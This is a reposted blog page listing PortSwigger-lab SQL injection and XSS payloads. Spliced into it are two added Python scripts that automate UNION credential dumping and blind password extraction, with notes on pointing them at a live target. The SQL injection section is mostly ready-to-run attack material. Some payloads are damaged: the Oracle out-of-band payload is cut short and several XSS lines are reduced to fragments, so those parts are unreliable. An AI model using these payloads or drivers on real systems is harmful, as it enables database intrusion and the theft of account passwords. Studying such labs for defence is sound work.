• Vulnerability payloads collected from the Burp (PortSwigger) website


    1. SQL injection

    WHERE clause
    '+OR+1=1--
    Login bypass
    administrator'--
    UNION clause
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    Identifying the database type
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    Enumerating database contents
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
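The UNION payloads above are three steps of one procedure: find the column count by adding NULLs until the error disappears, find a column that accepts a string by placing a marker in each column in turn, then pull `username||'~'||password` through that column. The `+` in the payloads is just a URL-encoded space. The following added example (not code from the page or from PortSwigger) automates those steps against a constructed SQLite stand-in for the lab's product filter; the query shape, table layout, column types and the `'Welcome'`-free error handling are assumptions made for this example.

```python
"""Added example: automating the UNION column probes listed above.

The target is a constructed SQLite stand-in for the product-category query;
its table layout and column types are assumptions for this example.
"""
import sqlite3

# Declared types of the three selected columns. The stand-in enforces them so
# that a string landing in a numeric column fails, as it would on Oracle/MySQL.
COLUMN_TYPES = (str, int, int)


def build_vulnerable_app():
    """Constructed stand-in: the category parameter is concatenated into SQL."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products (name TEXT, price INTEGER, released INTEGER, category TEXT);
        INSERT INTO products VALUES ('Gift Card', 10, 1, 'Gifts'), ('Mug', 5, 1, 'Gifts');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cr3t'), ('wiener', 'peter');
        """
    )

    def app(category):
        # Vulnerable: user input is spliced straight into the WHERE clause.
        sql = (
            "SELECT name, price, released FROM products "
            f"WHERE category = '{category}' AND released = 1"
        )
        try:
            rows = db.execute(sql).fetchall()
        except sqlite3.Error:
            return None  # the application shows a generic 500 page
        for row in rows:  # emulate a typed database: wrong type -> error page
            for value, kind in zip(row, COLUMN_TYPES):
                if value is not None and not isinstance(value, kind):
                    return None
        return rows

    return app


def count_columns(app, max_cols=10):
    """Step 1: ' UNION SELECT NULL,NULL,...-- until the query stops erroring."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if app(f"' UNION SELECT {nulls}--") is not None:
            return n
    raise RuntimeError("column count not found; raise max_cols")


def find_string_columns(app, ncols, marker="abcdef"):
    """Step 2: ' UNION SELECT 'abcdef',NULL,...-- with the marker in each column."""
    usable = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        rows = app(f"' UNION SELECT {','.join(cols)}--")
        if rows is not None and any(marker in row for row in rows):
            usable.append(i)
    return usable


def dump_credentials(app, ncols, col, sep="~"):
    """Step 3: route username||'~'||password through the usable column."""
    cols = ["NULL"] * ncols
    cols[col] = f"username||'{sep}'||password"
    rows = app(f"' UNION SELECT {','.join(cols)} FROM users--")
    creds = {}
    for row in rows or []:
        value = row[col]
        if isinstance(value, str) and sep in value:
            user, pwd = value.split(sep, 1)
            creds[user] = pwd
    return creds


if __name__ == "__main__":
    app = build_vulnerable_app()
    n = count_columns(app)
    col = find_string_columns(app, n)[0]
    print(dump_credentials(app, n, col))
```

Against a live target the `app` callable would send the category as a query parameter and return `None` on an HTTP 500; the three probe functions stay the same. `||` is Oracle/PostgreSQL/SQLite string concatenation; on MySQL use `CONCAT(username,'~',password)` and the `#` comment form shown above.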
    Blind injection: conditional responses
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    Blind injection: conditional errors (Oracle)
    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    Time-based blind injection (PostgreSQL)
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
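All three blind variants above follow the same loop: confirm the injection point with a true/false pair, find the password length with `LENGTH(password)>N`, then recover one character per position with `SUBSTRING(password,i,1)='§a§'` in Intruder. Only the oracle differs: a "Welcome back" string, an HTTP 500 from `TO_CHAR(1/0)`, or a `pg_sleep` delay. The following added example (not code from the page or from PortSwigger) implements that loop as a driver with a pluggable yes/no oracle, exercised against a constructed SQLite stand-in for the `TrackingId` cookie check. The table names, the `Welcome back!` marker and the stored password are assumptions for this example; the page probes the length one value at a time, while this driver binary-searches it with the same `>` predicate.

```python
"""Added example: a driver for the boolean-based blind extraction above.

The target is a constructed SQLite stand-in for the TrackingId cookie check;
its table layout, the 'Welcome back!' marker and the password are assumptions.
"""
import sqlite3

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def build_vulnerable_app():
    """Constructed stand-in: the cookie value is concatenated into the query."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE tracking (id TEXT);
        INSERT INTO tracking VALUES ('xyz');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'k9x2qv'), ('wiener', 'peter');
        """
    )

    def app(tracking_id):
        # Vulnerable: the TrackingId cookie is spliced into the SQL string.
        sql = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"
        try:
            found = db.execute(sql).fetchall()
        except sqlite3.Error:
            return "Internal Server Error"  # bad SQL -> generic 500 page
        return "Welcome back!" if found else "Hello"

    return app


def boolean_oracle(app, known_id="xyz"):
    """True iff the injected condition holds. Conditions are written as in the
    payload list, without a closing quote: the application's query adds it."""
    def ask(condition):
        return "Welcome back" in app(f"{known_id}' AND {condition}")
    return ask


def confirm_injection(ask):
    """The '1'='1 / '1'='2 pair: the page must differ between the two."""
    return ask("'1'='1") and not ask("'1'='2")


def password_length(ask, username, max_len=64):
    """LENGTH(password)>N probes, binary-searched instead of stepped."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        longer = ask(
            f"(SELECT 'a' FROM users WHERE username='{username}' "
            f"AND LENGTH(password)>{mid})='a"
        )
        if longer:
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(ask, username="administrator", charset=CHARSET):
    """SUBSTR(password,i,1)='c' probes, one position at a time (the §a§ loop).

    SUBSTR is used rather than the list's SUBSTRING because SQLite, MySQL,
    PostgreSQL and Oracle all accept it.
    """
    if not confirm_injection(ask):
        raise RuntimeError("injection point is not a usable boolean oracle")
    length = password_length(ask, username)
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if ask(
                f"(SELECT SUBSTR(password,{pos},1) FROM users "
                f"WHERE username='{username}')='{ch}"
            ):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character in charset matched position {pos}")
    return recovered


if __name__ == "__main__":
    ask = boolean_oracle(build_vulnerable_app())
    print(extract_password(ask))
```

To target the conditional-error or time-based variants, keep the driver and swap `boolean_oracle` for one that wraps the condition in the `CASE WHEN ... THEN TO_CHAR(1/0)` or `pg_sleep(10)` form and returns True on an HTTP 500 or on a response slower than the delay. Against a live target `app` sends the value in the `Cookie: TrackingId=...` header and returns the response body; note that the comparison is case-sensitive on most collations, so widen `CHARSET` if a position never matches.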
    Out-of-band interaction (Oracle)
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

    2. XSS

    ">

    javascript:alert(document.cookie)

    "onmouseover="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • Original URL: https://blog.csdn.net/tainqiuer123/article/details/125887065